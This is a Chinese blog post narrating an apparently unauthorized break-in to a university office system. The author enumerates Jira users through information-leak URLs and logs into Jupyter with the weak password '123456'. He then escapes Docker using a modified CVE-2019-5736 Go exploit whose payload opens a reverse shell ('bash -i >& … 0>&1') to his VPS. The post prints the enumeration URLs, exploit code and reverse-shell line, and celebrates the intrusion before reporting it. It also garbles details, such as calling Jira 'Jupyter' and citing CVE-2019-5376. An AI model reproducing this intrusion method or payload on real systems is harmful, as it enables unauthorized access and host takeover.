偶然的一次渗透从弱口令->docker逃逸

最新推荐文章于 2024-08-07 09:54:57 发布
最新推荐文章于 2024-08-07 09:54:57 发布
阅读量480 收藏
点赞数 1
分类专栏: Web安全
原文链接:https://mp.weixin.qq.com/s/k60iyRLDYdBmr8te5avEcg
版权

0x01 前言

前两天一直在学习Python造轮子,方便自己前期信息收集,测试脚本进行批量扫描的时候,无意中点开的一个带有edu域名,便有此文。

0x02 前期信息收集

Web整体架构:

操作系统:Ubuntu
Web服务器: Nginx+Java
端口开放信息: 80 443

目录扫描结果

图片

0x03 挨个测试

可以看到,扫描到了一个"jira目录",猜想是Jupyter NoteBook组件.

图片

访问果不其然,Jupyter组建的登陆点

图片

其他3个有效目录都是登陆点

  • gitlab

图片

  • ownclou

图片

 

  • confluence

图片

我晕~要让我爆破吗,先放着.由于Jupyter组件,到网上查阅历史漏洞

我晕~要让我爆破吗,先放着,由于Jupyter组件,到网上查阅历史漏洞

未授权+2个信息泄露

未授权访问漏洞修复了,需要密码

图片

利用信息泄露爆用户

Exp1:

/jira/secure/ViewUserHover.jspa?username=admin

Exp2:

/jira/rest/api/latest/groupuserpicker?query=admin&maxResults=50&showAvatar=true

图片

存在用户的话是会返回用户信息的,然后爆破~

图片

爆破出一个“Kevin”用户

掏出我珍藏几天的字典爆密码去~

图片

然后啥也没

图片

0x04 突破点

剩下最后一个登陆口了,修复了的未授权访问,怎么不修信息泄露呢?

图片

 

随手一个"123456"

图片

竟然...给我进来了(人要傻了)
那么就好办了,按照历史漏洞

New->Terminal

直接可以执行命令

图片

习惯性的去根目录,看看有啥文件

图片

看到'.dockerenv'文件,不是吧不是吧,在裸奔的我有点慌,难道踩罐了?

图片

查询系统进程的cgroup信息

图片

docker没错了,蜜罐的可能性不大,因为是部署在某知名大学的一个办公系统的.

0x05 docker逃逸

之前从没实战碰到过docker,也没复现过docker逃逸这个洞,这个点就折腾了比较久.

 

参考文章: https://www.freebuf.com/articles/web/258398.html
CVE-2019-5376这个漏洞是需要重新进入docker才能触发.才能弹回来shell的.而我们上面正好是可以直接进入docker终端,于是尝试利用

Poc:
https://github.com/Frichetten/CVE-2019-5736-PoC
修改main.go此处更改为弹shell命令

package main

// Implementation of CVE-2019-5736
// Created with help from @singe, @_cablethief, and @feexd.
// This commit also helped a ton to understand the vuln
// https://github.com/lxc/lcx/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
import (
    "fmt",
    "io/ioutil"
    "os"
    "strconv"
    "strings"
)

// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n bash -i >& xxxxxxxxxxxxxxxxxxxxxxxxxxx 0>&1"

func main() {
    // First we overwrite /bin/sh with the /proc/self/exe interpreter path
    fd, err := os.Create("/bin/sh")
    if err != nil {
        fmt.Println(err)
        return
    }
    fmt.Fprintln(fd, "#!/proc/self/exe")
    err = fd.Close()
    if err != nil {
        fmt.Println(err)
        return
    }
    fmt.Println("[+] Overwritten /bin/sh successfully")

    // Loop through all processes to find one whose cmdline includes runcinit
    // This will be the process created by runc
    var found int
    for found == 0 {

完了之后发现自己没有go语言环境

图片

听说Mac自带go语言环境,认识个表哥正好用的Mac,于是找他帮忙编译

图片

这就是"尊贵的Mac用户"吗,哈哈哈哈
自己折腾了一套go语言环境也是成功编译了.
到之前弱口令进入的Jupyter组件上传exp到目标Web站点

图片

我们这边VPS监听1314端口

图片

靶机运行我们的Exp

图片

然后我们回到Jupyter那个组件,重新进入终端界面

图片

然后莫名其妙没弹回来shell,乱晃悠发现是我自己VPS端口问题,换个端口,成功弹回来主机shell

图片

结语

貌似部署在阿里云上面的,未授权原因就不再继续深入了,交洞收工!

 

图片

zhangge3663
关注
专栏目录
内网渗透-Linux内网渗透
lza20001103的博客
08-16 1675
内网渗透-Linux内网渗透
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 2653
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
DockerDocker逃逸小结
woodwhale的博客
03-28 1825
docker逃逸小结
Docker容器逃逸
weixin_44720441的博客
08-23 1293
Docker容器逃逸指的是攻击者通过劫持容器化业务逻辑或直接控制(CaaS等合法获得容器控制权的场景)等方式,已经获得了容器内某种权限下的命令执行能力;攻击者利用这种命令执行能力,借助一些手段进而获得该容器所在的直接宿主机(当遇到“物理机运行虚拟机,虚拟机再运行容器”的场景时,该场景下的直接宿主机指容器外层的虚拟机)上某种权限下的命令执行能力。
docker逃逸方法汇总与简要分析
最新发布
2401_84466336的博客
08-07 1066
Docker Remote API 是一个取代远程命令行界面(rcli)的REST API,它允许用户通过RESTful API与Docker引擎进行交互,这意味着开发人员可以使用HTTP请求来远程管理和控制Docker引擎,包括创建、启动、停止和删除容器,构建和管理镜像,以及执行其他与Docker相关的操作。
Docker逃逸
weixin_57385269的博客
02-16 271
runc是一个底层服务工具,runC 管理容器的创建,运行,销毁等
Docker Dirty Cow逃逸
weixin_33966365的博客
10-29 388
2019独角兽企业重金招聘Python工程师标准>>> ...
红蓝对抗之Linux内网渗透
Tencent_SRC的博客
12-11 7094
文|腾讯蓝军 jumbo前言上篇内网渗透(附录1)主要讲的是Windows这块,最近知识星球“腾讯安平密友圈”提到了一个问题“为什么内网渗透偏向于Windows”,笔者也在下面进行了相关...
渗透测试或安服等面试问题与答案
Vdieoo的博客
11-29 4578
启明星辰 1开发做的模块有安全漏洞被你发现了,但是老板催着上线 你作为安全工程师怎么处理 加班加紧和开发一块处理安全漏洞,及时向老板汇报情况 2内网服务器被人种植shell,怎么做应急响应 常态化安全检查与安全加固 中间是流程 下层是 收集安全系统报警信息,根据威胁情报平台和之前误报的信息初步研判(何种安全事件),自己能解决则利用应急技能(进程分析,日志分析,样本分析)(清理处置:断网后远程连接杀进程,删文件,打补丁,查看攻击途...
内网渗透自己的笔记
xingxingdoukeyi的博客
10-22 272
拿到shell进入内网后虽然ms17010横行但也是不能拿着扫描器到处扫的,每一步都应该小心谨慎 首先在下认为应该判断是否为虚拟机,docker,蜜獾等 docker通常会有一些命令not find例如ifconfig uname-a 等 如果打着四面漏风的系统多半就是蜜獾了,而且里面没有正经的办公痕迹的也很可疑 vm虚拟机为运行xchg ecx,eax 时间大于0xFF时可以确定 //使用如下命令判断docker ls -alh ./dockerenv cat /proc/1/cgroup //没有i
关于Docker逃逸
Aiwin的博客
03-22 2408
Docker逃逸复现
生命在于学习——docker逃逸
易水哲的博客
12-02 4851
docker逃逸就是从当前docker容器权限中逃逸出来,获得宿主机的权限。
docker逃逸 从Play-with-Docker容器逃逸Docker主机
whatday的专栏
09-10 1962
导言 Play-with-Docker(PWD),即Docker的游乐场网站,专门供初学者迅速上手各种Docker命令。实际上,该网站是建立在许多Docker主机上的,每个主机运行多个供初学者使用的容器,所以,该网站是学习Docker的好去处。借助于PWD,人们可以在Web浏览器中免费体验Alpine Linux虚拟机,学生可以在Web浏览器中构建和运行Docker容器,这样,他们就可以直接体验...
【转】Docker逃逸那些事儿
tpriwwq的专栏
06-02 703
Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。通过利用某种手段,再结合执行EXP或POC,就可以返回一个宿主机的高权限shell,并拿到宿主机的root权限,可以直接操作宿主机文件,从容器中逃了出来,因此我们将其称为Docker逃逸漏洞。
docker逃逸的简单思路笔记
来到了学渣的博客
10-25 454
判断shell是不是在docker容器里边? 一般docker容器的shell都会带上上一串英文和数字(阿里云服务器也会),并且一些常见的命令并不能执行。如下 Docker容器才有的命令: root@d2c06d8f5809:/# ls -alh /.dockerenv root@d2c06d8f5809:~# cat /proc/1/cgroup 正常服务器不在docker容器: Docker逃逸思路: 查看docker容器ip 通过循环ping找到宿主机的IP,可以得到宿主机ip为1
怎么将以下代码转换为yaml文件kubectl create secret docker-registry myregistrykey --docker-server=$DOCKER_REGISTRY_SERVER --docker-username=$DOCKER_USER --docker-password=$DOCKER_PASSWORD --docker-email=$DOCKER_EMAIL
06-02
其中,`<base64-encoded-docker-config-json>` 是你的 Docker 配置信息的 Base64 编码。可以通过以下命令获取: ```bash cat ~/.docker/config.json | base64 ``` 然后将输出结果填入 `.dockerconfigjson` 字段中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值